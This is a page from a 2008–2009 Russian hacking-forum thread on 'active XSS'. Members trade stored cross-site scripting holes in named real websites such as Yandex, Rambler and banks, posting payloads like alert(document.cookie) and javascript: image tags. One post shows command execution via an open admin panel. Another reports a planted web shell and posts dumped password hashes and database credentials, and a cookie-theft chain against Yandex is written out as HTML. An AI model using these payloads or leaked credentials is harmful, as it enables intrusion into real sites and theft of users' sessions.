ANTICHAT
Страница 8 из 14 « Первая < 4 5 6 7 8 9 10 11 12 > Последняя »
Показывать 40 сообщений этой темы на одной странице

ANTICHAT (https://forum.antichat.xyz/index.php)
-   Уязвимости (https://forum.antichat.xyz/forumdisplay.php?f=74)
-   -   Активные Xss (https://forum.antichat.xyz/showthread.php?t=35802)

зяблик 07.11.2008 18:47
может меня кто обрадует?

foopi 17.11.2008 20:23
Цитата:
Сообщение от зяблик
народ а можно-ли че с этим сайтом сделать http://www.asto.ru/ или
http://www.happysvadba.ru/cat_item.php?iid=1078 и что можно вообще сделать с этим?
там админка для всех желающих открыта http://www.asto.ru/admin/all.php :D :D :D

l1ght 17.11.2008 21:12
Цитата:
Сообщение от foopi
там админка для всех желающих открыта http://www.asto.ru/admin/all.php :D :D :D
_http://asto.ru/eng/admin/sotrud.php
пишем <?system(id)?>
и видим
Цитата:
uid=2196(astoru03) gid=2200(astoru03) groups=2200(astoru03), 2000(virthost)

sabe 18.11.2008 07:33
// offtop

l1ght, foopi, зяблик
залил шелл..

смотрим..
Цитата:
info:pZLalPAr6jziQ:::::::
kucherov:P9Oa5.i.G3gQ.:::::::

$user="astoru03_asto";
$pass="qwerty";
$db="astoru03_withdriver";

зяблик 18.11.2008 15:00
foopi, l1ght, sabe Благодарю, чесно от души. Спасибо. За мной не заржавеет. Чем смогу тем помогу.

зяблик 18.11.2008 15:10
foopi, l1ght, sabe не сочтите конечно за наглость или необразованность скорее все вместе:) подскажите какую литературу надо учить. ? Есть желание, возможности и время. А с чего начать?

foopi 18.11.2008 19:27
video.antichat.ru

зяблик 18.11.2008 20:08
Цитата:
Сообщение от foopi
video.antichat.ru
это все хорошо:) но команды языки ?, я вот в этом деле новенький, понимаешь вот как говорил, есть желание. Но а в подробностях, это все узнать как . Ксати там есть уже результат можете глянуть:))

NFM 18.11.2008 21:06
для начала научись пользоваться мозгом и дуй в другой раздел, здесь идет обсуждение совсем других вопросов.

sabe 19.11.2008 09:27
например можеш освоить sql inject
http://forum.antichat.ru/thread43966.html
http://forum.antichat.ru/thread19844.html

по возникшим вопросам сюда..
http://forum.antichat.ru/lastpostinthread46016.html

dfgrd 21.11.2008 20:38
http://sacredangelro.com/svn/
в чате <script>alert(XSS)</script> в теме сообщения

-m0rgan- 22.11.2008 21:15
Код:
liter.kz
Код:
zaycev.net
В обоих уязвимо поле поиска.
Код:
Код:
'><script>alert('xss')</script>

NFM 22.11.2008 21:50
это не активка, это пассивка, смотрим внимательно

Ded MustD!e 25.11.2008 02:27
RAMBLER.RU

http://id-planet.rambler.ru/other/education/add

Добавляем учебное заведение, уязвимы поля "Название:" и "Факультет / Специализация:"

Pashkela 25.11.2008 02:48
http://www.ecco-shoes.ru/rsm/gallery/

там слева поля для поиска - 5 штук.

Имя
Фамилия
Электронная почта

Город
Ключевое слово


Во всех XSS:)))))))))

"><script>alert('ГОЛО_СУЕМ')</script>

Luccifer 25.11.2008 17:08
yandex.ru

http://passport.yandex.ru/passport?mode=auth&retpath=http%3A%2F%2Fimages.yan dex.ru%2Fyandsearch%3Fp%3D20%26text%3Dwhack%26rpt% 3D%2522%253E%253Cscript%253Ealert(document.cookie) %253C%2Fscript%253E%26login

chekist 25.11.2008 20:40
Цитата:
Сообщение от Luccifer
yandex.ru

http://passport.yandex.ru/passport?mode=auth&retpath=http%3A%2F%2Fimages.yan dex.ru%2Fyandsearch%3Fp%3D20%26text%3Dwhack%26rpt% 3D%2522%253E%253Cscript%253Ealert(document.cookie) %253C%2Fscript%253E%26login
не работает :mad:

оперативно залатали :confused:

iddqd 11.12.2008 20:39
Яндекс.

На Яндексе есть такой сервис- "Мои находки" (nahodki.yandex.ru). Если запись истории включена, то на странице http://nahodki.yandex.ru/results.xml мы можем наблюдать свои поисковые запросы, и эти строки не фильтруются.
Что нам нужно сделать, чтобы поиметь чужие куки:
  • "Насильно" включить юзеру запись истории
  • Послать яндексу ядовитый поисковый запрос
  • Направить юзера на зараженную страницу истории запросов
Для этого будем направлять жертву на специальную страницу(через iframe сделать не удалось, т.к. яндекс не разрешает показывать свои страницы во фреймах).
Кодес:
Код:
<html>
<body onload="location.href='http://nahodki.yandex.ru/';">
<img src="http://nahodki.yandex.ru/save_tunes.xml?store=1">
<img src="http://yandex.ru/yandsearch?clid=14585&text=тут_наш_злобнокодес">
</body>
</html>

Pashkela 11.12.2008 22:22
Цитата:
(через iframe сделать не удалось, т.к. яндекс не разрешает показывать свои страницы во фреймах).

Код:
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Миракаль</title>
</head>
<frameset rows="30,30,30" cols="*">
<frame src="http://rambler.ru" name="rambler" scrolling="no" noresize>
<frame src="http://yandex.ru" name="yandex" scrolling="no" noresize>
<frame src="http://google.ru" name="google" scrolling="no" noresize>
</frameset>
</html>

iddqd 15.12.2008 20:27
otake.ru

В "псто" вставляем какбэ картинку:
Код:
javascript:eval(String.fromCharCode.....)
только для риальне воене!!!1

faza02 19.12.2008 19:20
пример:
Код:
http://www.zachetka.ru/forum/showthread.aspx?threadId=35295
хсска в логине.

Kolja 21.12.2008 04:32
http://www.schoolport.ru/

В форуме, при создании темы, уязвимы все поля...

В принципе он съедает любой джава код, так что писать что я туды закидывал не надо...

Kolja 21.12.2008 16:57
http://www.sgames.com.ua

В поле для ввода коментариев к статье:
<script>alert()</script>

DVD_RW 21.12.2008 17:04
Цитата:
Сообщение от Kolja
http://www.sgames.com.ua

В поле для ввода коментариев к статье:
<script>alert()</script>
а ты уверен что это активная ?

Kolja 21.12.2008 17:47
не уверен... хм...

echobyte 22.12.2008 04:37
http://compfaculty.net.ua/misc/index.php?a=117

з.ы. абсолютно согласен с автором статьи, ибо учусь на этом же факультете

iddqd 27.12.2008 16:17
Бесплатные форумы aimoo.com
В профиле при редактировании подписи есть возможность вставить Ubb Code
Код:
[img]javascript:alert(document.cookie);[/img]
http://ligendo.aimoo.com/General-Dis...-1-172013.html

iddqd 28.12.2008 01:10
Социальная сеть privet.ru

PR:4
тИЦ:1800


В персональных сообщениях вставляем картинку с адресом javascript: и так далее....
воен знае, что делать!!1

iddqd 29.12.2008 15:31
Nightlife.ua

Крупный клубный портал.
Везде, где есть комментарии- уязвимы теги вставки изображения и гиперссылки. В личных сообщениях тоже.

Код:
http://nightlife.ua/gallery/cat/1088/photo/44496/
жмем на ссылку в коменте- и тут ололо пыщ пыщ алирт риальне!!11

iddqd 08.01.2009 19:39
UDAFF.COM

В профиле пользователя уязвимо поле ICQ

Цитата:
http://udaff.com/users/ligendo/
только для настоящих падонкаф!

flem 09.01.2009 14:42
Цитата:
http://www.alfabank.com.ua/search.php
и фазына ххс в поиске
Цитата:
http://www.pr-bank.ru/

iddqd 12.01.2009 00:13
blox.ua
Укр. блоги.
В теле поста голый js не проходит, но уязвимы многие теги(img, href etc).

xcedz 12.01.2009 04:45
paint.kards.qip.ru
Оставляем комент например к рисунку с нашим кодом.

при заходе на страничку автора рисунка срабытывает код.

winstrool 12.01.2009 15:05
http://www.voshod-avto.ru/catalogue.php?binn_rubrik_pl_catelems1=25609

активное поле: "По наименованию:"

P.S
на alert у меня не сработало на на iframe срабатывает

CMS: BinN S.Builder

winstrool 12.01.2009 16:27
http://saret-auto.ru/model/pilot/configurator/#forma

Уязвимы все поля кроме "Дополнительной информации:"
тоже сработал только iframe

iddqd 12.01.2009 19:18
vorum.ru - вопросы и ответы на любую тему
При заполнении профиля уязвимо поле "Имя". Но есть ограничение в 25 символов :(
Цитата:
http://vorum.ru/profile/show/ligendo

iddqd 13.01.2009 13:43
m@il.com

В теле письма уязвим тег <img>
Но злой фильтр превращает
Код:
javascript:alert()
в
Код:
xjavascript:alert()
:(

А вот когда жертва нажимает "Reply"- код срабатывает. :)
Так что в связке с СИ баг вполне рабочий. Проверено на Opera 9.63
IE- не сработало :mad:

ZEXEL 15.01.2009 02:04
http://www.articles.turne.com.ua/fotoreportazh-p-photo-716

Уязвимо поле Имя при добавлении коментария !

iddqd 15.01.2009 22:27
my.opera.com

В профиле пользователя, в графе "Web site" принимается JS. Для срабатывания необходимо нажать на ссылку.

Цитата:
http://my.opera.com/ligendo/about/

ZEXEL 16.01.2009 22:16
dbservermanager.com

Уязвимы поля : "Your Name" and "Testimonial"

Цитата:
http://dbservermanager.com/Testimonials.aspx
aromatshop.com

Уязвимы поля : "Имя:" and "Отзыв" во всех ID

Цитата:
http://aromatshop.com/?productID=22


Время: 13:18
Страница 8 из 14 « Первая < 4 5 6 7 8 9 10 11 12 > Последняя »
Показывать 40 сообщений этой темы на одной странице